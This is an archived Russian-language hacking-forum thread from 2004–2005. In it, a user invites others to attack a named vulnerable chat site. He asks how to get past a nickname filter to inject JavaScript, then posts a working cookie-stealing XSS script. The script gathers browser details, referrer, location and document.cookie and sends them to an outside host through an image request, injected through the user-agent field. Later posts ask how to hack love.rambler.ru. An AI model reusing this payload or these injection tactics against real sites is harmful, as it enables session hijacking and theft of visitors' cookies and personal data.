ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.12.2004, 22:18
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
ВНИМАНИЕ!!!!!
В том чате "Борнео" разрешена регистрация !
Если кто не желает помучить бедный дырявый чат не
заходите туда, а то у вас это может получиться ...
Здесь ссылка Borneo.ru
хи-хи-хи...
описание дырок на гл. странице (статья про взлом чатов и в пример конкретный...)

Последний раз редактировалось &clubs -Dmitro- ♣ 24.12.2004 в 04:49..
|
|
|

15.12.2004, 08:46
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
Немного от темы...
Жизненно важный вопрос!!
Если ктонть знает, скажите, в обычном html документе можно скрипт написать, узнающий реферера, или я опять страдаю иллюзиями о лёгких взломах??????
УБЕДИТЕЛЬНО ПРОШУ ответить тех, кто знает, хотя бы в принципе???

Последний раз редактировалось &clubs -Dmitro- ♣ 24.12.2004 в 04:48..
|
|
|

15.12.2004, 14:46
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
Реферера ? Для текущего документа можно узнать ...
|
|
|

18.12.2004, 16:04
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
Вопрос наверное к Algol
Вообщем то попал на один чат, построение впринципе уже знакомое,но! уж через-чур фильтры сильные: ничё не пропускает,кроме как через ник,
и то немного.. короче:
......
<a href="#end" onclick="return Write('НИК, ')">
<b>НИК:</b></a><font color=C0C0C0> Сообщение</font> ......
в нике пропускаются : & # % ' > / \ ;
единственное,что смог - эт на событие onclick, но не могу перекрыть двойную кавычку onclick, можно ли что то
сделать,хотя бы вывести на onmouseover ?????
У меня нифика не получилось... .
Да,кстати только в нике! а в репликах на всё фильтр.
Помоги, плиииз ?

Последний раз редактировалось &clubs -Dmitro- ♣ 24.12.2004 в 12:36..
|
|
|

20.12.2004, 22:10
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
пам-парам-пам-пам-пам-парам-парарарарам-парам-пам-пам...
походу здесь нифика не видно и никто мне не ответит....
тогда надо тему кильнуть...........

Последний раз редактировалось &clubs -Dmitro- ♣ 24.12.2004 в 04:30..
|
|
|

23.12.2004, 21:59
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
ХОП-ХЕЙ
КРУТО!!! Написал скрипт, который всё же вытягивает инфу о рефере, и не тока... И всё в HTML..
Спасибо за вдохновление Кубинскому приятелю че гевере  )
Хоть algol и говорил, что нельзя...
Ну вообщем он будя всё выдавать о юзере.
Может кому тоже нужно будет, так я не жадный (Продвинутым можно не читать, а то опять скажите,что эт уж давно известно или чёнть в этом духе... )
Ещё одно изобретение (можно узнать и не тока для текущего HTML но и... ) Но простите, пока все чаты не переломаю фиг скажу... ХА!
-
<Script language="JavaScript"> if(navigator.userAgent.indexOf('IRIX') != -1) { var OpSys = "Irix"; } else if((navigator.userAgent.indexOf('Win') != -1) && (navigator.userAgent.indexOf('95') != -1)) { var OpSys = "Windows 95"; } else if(navigator.userAgent.indexOf('Win') != -1) { var OpSys = "Windows 3.1 or NT"; } else if(navigator.userAgent.indexOf('Mac') != -1) { var OpSys = "Macintosh"; } else { var OpSys = "Other"; }date= new Date();zone= date.getTimezoneOffset();gmt= date.toGMTString();bname=navigator.appName;bversio n=navigator.appVersion;if (bname=="Netscape"){bplugins=navigator.plugins.len gth;}if (bname=="Netscape"){address=java.net.InetAddress.g etLocalHost(); ip=address.getHostAddress();}loc=location.href;mod i=document.lastModified;refer=document.referrer;if (bname=="Netscape"){var tools=java.awt.Toolkit.getDefaultToolkit();var size=tools.getScreenSize();w=size.width;h=size.hei ght;}</Script><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+refer+loc+OpSys+modi+date+bname+bversion+d ocument.cookie;</script>
Вообще то я его в одну строчку делал, так шо проверять не буду чё там после вставки стало.. да и немного выдернул из него (секрет)
А идею мне счётчики статистик подкинули, они много чего могут..
Короче вставляю его в инфу (В чате) через юзерагента, как я писал в статье для новичков, и в логах сникерса смотрим........
Так шо версия для новичков, но и то харшо...
А другие данные - эт конеШна секрет.
тфу блин, лишнего урезал.. если надо скрин сайз, то ещё к сникерсу +h и +w..
Да, кстати, чё, кто-то GOOGLE заснифирил??? я когда
логи смотрел, видел там про него... Эт круто! Молодцы!
♣ -Dmitro- ♣

Последний раз редактировалось &clubs -Dmitro- ♣ 24.12.2004 в 04:39..
|
|
|

16.01.2005, 19:01
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме: 130949
Репутация:
34
|
|
КтоНьть знает как ломануть love.rambler.ru ?? там посетителей неибаца, можно свой сайт раскрутить прилично...

|
|
|

16.01.2005, 19:31
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме: 20377164
Репутация:
0
|
|
love.rambler.ru
Будет статья на этот счет... Жди...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|